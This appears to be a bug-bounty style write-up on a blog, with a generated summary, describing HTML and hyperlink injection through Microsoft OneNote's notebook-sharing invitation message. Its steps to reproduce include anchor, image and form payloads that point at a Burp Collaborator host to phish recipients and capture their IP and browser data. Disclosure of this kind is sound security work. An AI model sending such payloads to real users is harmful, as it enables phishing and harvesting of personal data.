Summary

The content describes vulnerabilities in Microsoft OneNote's sharing feature, allowing attackers to perform hyperlink and HTML injection attacks to deceive users and potentially harvest sensitive information.

Abstract

The article outlines a security flaw within the Microsoft OneNote application, specifically within its sharing functionality. It details how an attacker can exploit this vulnerability to inject malicious hyperlinks and HTML code into emails sent via OneNote's sharing option. The attack can lead to phishing campaigns, where users are tricked into clicking on links that redirect them to fraudulent websites designed to collect personal data such as IP addresses and browser information. The article also provides a step-by-step guide on how to reproduce the attack, including the use of HTML tags to create deceptive links and forms. The impact of such an attack could be significant, enabling the redirection of user traffic to malicious IP addresses or domains and potentially leading to partial website defacement. The issue was reported to the Microsoft Security Response Center (MSRC) and, after being addressed, was deemed out of scope for their program.

Opinions

The article implies that the vulnerability could be particularly effective when used against corporate email addresses, suggesting that phishing protections might be more easily bypassed in such environments.
It is suggested that the attack vector could be used to collect a variety of user information through the injection of HTML forms and image tags, indicating a broad potential for data harvesting.
The inclusion of screenshots and code snippets conveys a level of technical detail and credibility to the reported vulnerability and its exploitation.
The mention of the issue being marked as out of scope by the MSRC program after resolution implies a possible discrepancy in the perceived severity or relevance of the vulnerability between the reporter and Microsoft's security team.
The article concludes with a promotional note, inviting readers to subscribe to a newsletter for ongoing updates in the information security field, which suggests an educational intent to keep the community informed and engaged.

HTML and Hyperlink Injection via Share Option In Microsoft Onenote Application

Hyperlink Injection it’s when attacker injecting a malicious link when sending an email invitation. HTML injection attack is injecting HTML code through the vulnerable parts of the website. The Malicious user sends HTML code through any vulnerable field with a purpose to change the website’s design or any information, that is displayed to the user. It is possible to inject html code in the message filed, which can be used to redirect user to malicious website and also causes change of website content via tag.

Hyperlink injection in the email can lead to phishing via email directly to users.
Attacker can share one with fake titles like “You have won 1000 RS. Click to claim”.
And in the mail, itself due to HTML injection, it is possible to inject HTML code and make the URL Hyperlink. Which can be further added to make fake emails.
In the mail header itself shows via outlook.com, which makes the email genuine.
Only thing attacker need is a email and in case of company (organization email) this can be used bypass the phishing protections. HTML injection in the using tag for href attribute can be used for redirecting user to fake IP or redirect traffic to any IP , which can further redirect the traffic to domain .
Fake links can be used for collecting user information such as IP address and browser info via user agent and location. By putting tags it can lead to partial defacement by changing the font size and look.
Only thing attacker need is a email and in case of company (organisation email) this can be used bypass the phishing protections.

Steps to Reproduce:

Create New Notebook and login via [email protected] user.
Click on share in the right corner. In the `Sharing Options > Invite People to Notebook.

Then Type Email and Include Message.
In the include message enter any of the below mentioned payload:

1) HTML <a> Tag: <a href=”https://burpcollaboratorlink.burpcollaborator.net"> Click to win</a>

2) Image Tag: <img src=”https://burpcollaboratorlink.burpcollaborator.net">

3) HTML FORM:

< html>
< body>
< h2 >HTML Forms< /h2 >
< form action="burp-coolaborator.burpcollaborator.net">
< label for="fname">First name:< /label>< br>
< input type="text" id="fname" name="fname" value="John">< br>
< label for="lname">Last name:< /label>< br>
< input type="text" id="lname" name="lname" value="Doe">< br>< br>
< input type="submit" value="Submit">
< /form>
< p>Click to win< /p>
< /body>
< /html>

Share it with the victims.
Check the phishing email on outlook.

Check the email on gmail.

Once victim will click on the link it will be redirected to malicious website.

Impact

HTML injection in the using tag for href attribute can be used for redirecting user to fake IP or redirect traffic to any IP , which can further redirect the traffic to domain .
Fake links can be used for collecting user information such as IP address and browser info via user agent and location.

Once the issue was fixed it was marked as out of scope by the MSRC program.

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE! https://weekly.infosecwriteups.com/